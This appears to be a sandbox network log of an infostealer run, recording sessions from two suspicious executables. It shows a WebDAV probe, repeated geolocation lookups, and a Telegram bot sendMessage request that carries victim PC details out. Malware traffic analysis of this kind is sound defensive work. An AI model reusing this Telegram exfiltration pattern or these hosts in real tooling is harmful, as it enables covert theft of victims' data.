                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a97937f190c4345-EWR
                                              alt-svc: h3=":443"; ma=86400


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port
                                              8           192.168.2.22  49169        172.67.197.72   443
                                              Timestamp                Bytes transferred  Direction  Data
                                              2024-07-26 21:45:24 UTC  170                OUT        PROPFIND / HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                              Depth: 0
                                              translate: f
                                              Content-Length: 0
                                              Host: meridianresourcellc.top
                                              2024-07-26 21:45:24 UTC  748                IN         HTTP/1.1 405 Method Not Allowed
                                              Date: Fri, 26 Jul 2024 21:45:24 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Allow: OPTIONS,HEAD,GET,POST,TRACE
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0MnJXF4N1mFutiJDM0GTIiJfLwoJNY1XtU1IyzFH3YsYsnm%2B%2BwoG9VKNsCSrwULBzldk%2BWGZjZltehm2ajIfakJ8O8GkAofkUY1B%2FVw2oimHeogWFjd3NzzziwJLIc7gxfQjuESIMMD%2B8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a9793993a611879-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:24 UTC  230                IN         Data Ascii: e0<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                              2024-07-26 21:45:24 UTC  6                  IN         Data Ascii: 1
                                              2024-07-26 21:45:24 UTC  5                  IN         Data Ascii: 0


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port
                                              9           192.168.2.22  49170        172.67.197.72   443
                                              Timestamp                Bytes transferred  Direction  Data
                                              2024-07-26 21:45:28 UTC  170                OUT        PROPFIND / HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                              Depth: 0
                                              translate: f
                                              Content-Length: 0
                                              Host: meridianresourcellc.top
                                              2024-07-26 21:45:29 UTC  748                IN         HTTP/1.1 405 Method Not Allowed
                                              Date: Fri, 26 Jul 2024 21:45:28 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Allow: OPTIONS,HEAD,GET,POST,TRACE
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jfz3FVHSAjBcFz269Eqy4O1UYnl2uZQ46O%2Fn6XBUJud96nzlFvdJvKrevF9VTpxJvX6%2FfiE%2BOkfxQV%2B%2BMrW9ljZbraOxhcwk23DV4VGRFDDHBG4NGJlqcDOXr53uJo4aGdibZrLuHp2UZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 8a9793b29fca43a4-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:29 UTC  230                IN         Data Ascii: e0<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                              2024-07-26 21:45:29 UTC  6                  IN         Data Ascii: 1
                                              2024-07-26 21:45:29 UTC  5                  IN         Data Ascii: 0


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              10          192.168.2.22  49172        188.114.97.3    443               3880  C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Timestamp                Bytes transferred  Direction  Data
                                              2024-07-26 21:45:33 UTC  84                 OUT        GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:33 UTC  704                IN         HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:33 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52946
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wOq3EccjYzCU4kRj3Xj7U7ViRr9kiUCBBX71fMAQ2QfTGy4yWDTko6QHUHmuk3D2DvnDSeFdlUGzgatqARv%2F6wElnxkogiGdCYgPAjSjes0VddsvA8u%2F19uOG9aqiydsnc5VMMrP"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9793d1f9e64401-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:33 UTC  340                IN         Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:33 UTC  5                  IN         Data Ascii: 0


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              11          192.168.2.22  49173        188.114.97.3    443               3880  C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Timestamp                Bytes transferred  Direction  Data
                                              2024-07-26 21:45:34 UTC  60                 OUT        GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-26 21:45:34 UTC  706                IN         HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:34 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52947
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ujXyklca8eklKYIUvbKeF%2BW6YYF7CWg4yD%2F3JoOqXtwD3EjnVAmvuz6EGCAJhKrOKPfKmV1XeJ6TeYHT4fa49mNDgu1LrSd%2FrIYVIEDAjqYryAwNeMcVXhPETtK2fysUBVci90NH"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9793d89cb97d00-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:34 UTC  340                IN         Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:34 UTC  5                  IN         Data Ascii: 0


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              12          192.168.2.22  49175        188.114.97.3    443               3880  C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Timestamp                Bytes transferred  Direction  Data
                                              2024-07-26 21:45:36 UTC  84                 OUT        GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:36 UTC  708                IN         HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:36 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52949
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=exzimh%2FfCkWM00XKtUP7n7rxKVYdZ61nJESUsj8iNfFV3CcBH05P3ZWmy8sh9raN4sC%2B8047ysrwOX%2BEdL2MxeYZR5%2FgA7XCgj2jtg1NfKwLJE4xQBQHKIa23yYOtYRG3fwRO39l"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9793e1aa8f4233-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:36 UTC  340                IN         Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:36 UTC  5                  IN         Data Ascii: 0


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              13          192.168.2.22  49178        188.114.97.3    443               2060  C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp                Bytes transferred  Direction  Data
                                              2024-07-26 21:45:38 UTC  84                 OUT        GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:38 UTC708INHTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:38 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52951
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pSxDHy3qPVKnMaagdSkI9fR9Z1izbWZbwa0XJcbkWV0qEo6CmIWbN4G%2F7zHcnutTzeTE6uAlitoJvQM7vzG2%2B%2BEyuvduH26QMwKQMkG6PkvPrk44z3%2BtaFrnwfq5uPqfgiYWLpBI"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9793f18ede439a-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:38 UTC | 340 | IN
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              14 | 192.168.2.22 | 49179 | 188.114.97.3 | 443 | 2060 | C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:39 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-26 21:45:39 UTC | 712 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:39 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52952
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q%2FiKxM6jHOPgjvjJ3GOSPxP2IgRTtzPJFYjeoSRKlfKSBxc0uZMXtLHWThcwvXC7lf1HKwPu%2BN9ng9J74x5%2Bo8p%2BHHV%2B5cB5vlgm8qBR1QXi%2FP529DkTUzd7XrXRjpCYW5v8CaZY"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9793f6ffb77288-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:39 UTC | 340 | IN
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              15 | 192.168.2.22 | 49181 | 188.114.96.3 | 443 | 3880 | C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:41 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:41 UTC | 714 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:41 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52954
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BzMaFP3yp9jCNdr%2FQPxMFlWCImvFMvJWuEcBJ0HFlyROUwFui6hBaKmavYu%2BvxgOh1Sb8H6GwhptWK46dyClykG3%2FTZeGxMbqJmh1k%2F49TSL4A%2BXzkNRkwk0f0rEcW9mV%2BpCk5FM"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9794012c0c43f2-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:41 UTC | 340 | IN
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              16 | 192.168.2.22 | 49183 | 188.114.97.3 | 443 | 2060 | C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:42 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:42 UTC | 708 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:42 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52955
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mzCvUKwVsfh%2Bf5HFiuvfY6Eq6NkRRCjmSDMHMgPF7uqoekI53ZpSPf7Z4j7r8QPhHUt%2F5KJdKF55XJcAePbT2j00Zpn1jVdOuZ9Z%2FV9rHakTCYoRQJNxWdBAmJ3GbrxqT5PPE%2Fjw"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9794067da6187d-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:42 UTC | 340 | IN
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              17 | 192.168.2.22 | 49186 | 188.114.96.3 | 443 | 3880 | C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:43 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-26 21:45:43 UTC | 716 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:43 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52956
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vzas4S%2FwBtOQlzVTaimikMNz2yy8%2F9w8HNjgIDWNz6fK%2BW0DEiiwD2SlS30QniGKd%2BVT8XUeNaWGmBdivppWimBD9FpG%2FGnCo2I0RMUahfkv6Su6o3%2FUd%2FCgFpsWWb9QHBOhzSJ%2B"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a97941139c942d0-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:43 UTC | 340 | IN
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              18 | 192.168.2.22 | 49188 | 188.114.97.3 | 443 | 2060 | C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:44 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:45 UTC | 704 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:45 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52958
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l3Dr9o7%2Bc7SeJeOrpbKcUseqs0fO23KPLVC3jy2oZ70R3T1kJ27crmNw4IuoGVQuvk6hHhSDLOlGkTjZFi7EMuaVOMK0GZEcS86AHyODGnAs5dfHcXdCVcisegxnL8zzBS%2FJpyBN"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a979418ae6f7c90-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:45 UTC | 340 | IN
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              19 | 192.168.2.22 | 49189 | 188.114.96.3 | 443 | 3880 | C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:45 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-26 21:45:45 UTC | 722 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:45 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52958
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xa2T%2BFUzCyhdxO5gfIZfiU24iOGD6pxoc4JWlhED3Ym8aOcbs51JruV%2FIMwFZ%2BbKI%2B36Hm%2F%2BjMoEe8edXWUtq605P8YM%2BR%2BTBgl%2F%2B5UTSX4ndng1uYPhoJ%2BfiI638uDUiSiPKfCq"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a97941c1c5243e8-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:45 UTC | 340 | IN
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              20 | 192.168.2.22 | 49192 | 188.114.96.3 | 443 | 3880 | C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:47 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-26 21:45:47 UTC | 706 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:47 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52960
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bOno3iJJ22ihgUAEFf7SL8%2B0akGYRFerwQzebtELe%2BnlzkJhv2iiUz4%2BTPLH8hUsfmc05fOy0FCEwhfuk4dR32e1mxwtzd3OH3Rrt2eSqwJRqt9pA5KLhDmIsv20Nz29wUnP8XJa"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a979425bb325e73-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:47 UTC | 340 | IN
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              21 | 192.168.2.22 | 49193 | 188.114.97.3 | 443 | 2060 | C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:47 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-26 21:45:47 UTC | 704 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:47 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52960
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L56wdnqxpgpbX9pv9DJ8UCEavw1e6Zg25GZhaCUbwjeFqQwVh0sEgwwqmEfDw25j6GXeckaU4J9wuhjup5cNVCsLhSlf4howdQAIQTi5F%2FPVry6do14NtNMiERhh52ZqXoGM%2FWCT"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a9794276e503314-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:47 UTC | 340 | IN
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              22 | 192.168.2.22 | 49194 | 149.154.167.220 | 443 | 3880 | C:\Users\user\AppData\Roaming\swagodi78811.scr
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:47 UTC | 348 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%207:26:36%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:48 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Fri, 26 Jul 2024 21:45:48 GMT
                                              Content-Type: application/json
                                              Content-Length: 55
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-07-26 21:45:48 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              23 | 192.168.2.22 | 49196 | 188.114.96.3 | 443 | 2060 | C:\Users\user\AppData\Roaming\gRpkBp.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-26 21:45:48 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-26 21:45:48 UTC | 706 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Jul 2024 21:45:48 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 52961
                                              Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CDM1u99eMl9a47VgUxQf2MSN%2FdBGGhTx0JeohTYeShVR10oDU3A30GWCFNrarEbCF0FbKWcR8CrmIf%2B9iUiyifMBnfMe81acY033pTX5iBMB2ImXldo%2FL5WqjYRow0vGt5DetZNM"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a97942ebba142b3-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-26 21:45:48 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-26 21:45:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
